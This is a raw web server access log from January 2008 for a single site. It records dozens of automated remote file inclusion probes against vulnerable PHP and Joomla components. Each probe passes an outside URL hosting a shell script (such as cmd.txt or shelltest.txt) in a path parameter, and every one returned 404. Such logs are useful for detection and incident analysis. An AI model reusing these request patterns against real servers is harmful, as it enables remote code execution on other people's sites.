38.102.88.143 - - [12/Jan/2008:07:22:37 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 321 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:07:22:37 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:07:22:37 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:07:24:54 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:07:25:30 -0800] "GET /logs/access.log/modules/vwar/admin/admin.php?vwar_root=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:07:25:30 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:07:25:30 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:07:28:08 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:07:28:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:07:28:08 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.65" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:07:29:34 -0800] "GET /logs/access.log/modules/vwar/admin/admin.php?vwar_root=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:07:29:35 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:07:29:35 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.64" "www.projectpr.com"
201.212.0.39 - - [12/Jan/2008:07:34:12 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.212.0.39 - - [12/Jan/2008:07:34:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.212.0.39 - - [12/Jan/2008:07:34:13 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:07:35:03 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.59.182.2 - - [12/Jan/2008:07:39:07 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:07:42:55 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:07:42:55 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:07:43:25 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 322 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:07:43:28 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:07:43:28 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:07:43:28 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:07:43:28 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:07:43:29 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:07:43:29 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:07:43:31 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.59.182.2 - - [12/Jan/2008:07:52:47 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.59.182.2 - - [12/Jan/2008:07:52:47 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:07:53:53 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:07:53:53 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:07:53:53 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
71.245.244.82 - - [12/Jan/2008:07:56:54 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
71.245.244.82 - - [12/Jan/2008:07:56:54 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 299 "-" "libwww-perl/5.805" "www.projectpr.com"
71.245.244.82 - - [12/Jan/2008:07:56:55 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:07:59:22 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:07:59:23 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:07:59:23 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.64" "www.projectpr.com"
217.67.237.143 - - [12/Jan/2008:08:00:37 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [12/Jan/2008:08:00:37 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [12/Jan/2008:08:00:38 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
71.245.244.82 - - [12/Jan/2008:08:00:59 -0800] "GET /logs/access_070712.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kluna.info/ferryc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:08:03:25 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:08:03:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:08:03:26 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
80.93.58.70 - - [12/Jan/2008:08:03:31 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.93.58.70 - - [12/Jan/2008:08:03:32 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:08:03:38 -0800] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.106.46.84 - - [12/Jan/2008:08:04:11 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [12/Jan/2008:08:04:11 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [12/Jan/2008:08:04:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:08:06:34 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:08:06:35 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:08:06:36 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.26.76 - - [12/Jan/2008:08:08:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "projectpr.com"
74.6.19.105 - - [12/Jan/2008:08:08:34 -0800] "GET / HTTP/1.0" 200 9521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "projectpr.com"
62.193.248.95 - - [12/Jan/2008:08:14:09 -0800] "GET //appserv/main.php?appserv_root=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:08:14:09 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:16:45 -0800] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:08:19:27 -0800] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:08:19:57 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:08:19:57 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:08:19:58 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
217.67.237.143 - - [12/Jan/2008:08:21:14 -0800] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:08:22:42 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:22:49 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:22:49 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:23:25 -0800] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:23:29 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:23:30 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:23:30 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:23:31 -0800] "GET /logs/access_070812.log/components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:23:31 -0800] "GET /logs/components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:24:00 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:24:01 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:24:03 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 311 "-" "libwww-perl/5.805" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:08:24:40 -0800] "GET /logs/access_070712.log/components/com_smf/smf.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:24:46 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:24:48 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:24:49 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:25:24 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:25:24 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:25:24 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:08:25:51 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
80.93.58.70 - - [12/Jan/2008:08:26:33 -0800] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:27:05 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:27:06 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:08:27:06 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.events.rustygrape.com//includes/djd1.txt??? HTTP/1.1" 404 311 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:28:19 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:28:19 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:28:19 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:28:29 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:28:29 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:28:29 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:12 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:12 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:12 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:15 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:15 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:15 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:22 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:22 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:22 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:38 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:38 -0800] "GET //skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:38 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:43 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:44 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [12/Jan/2008:08:29:44 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:08:29:46 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.projectpr.com"
62.193.248.95 - - [12/Jan/2008:08:29:47 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:08:29:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
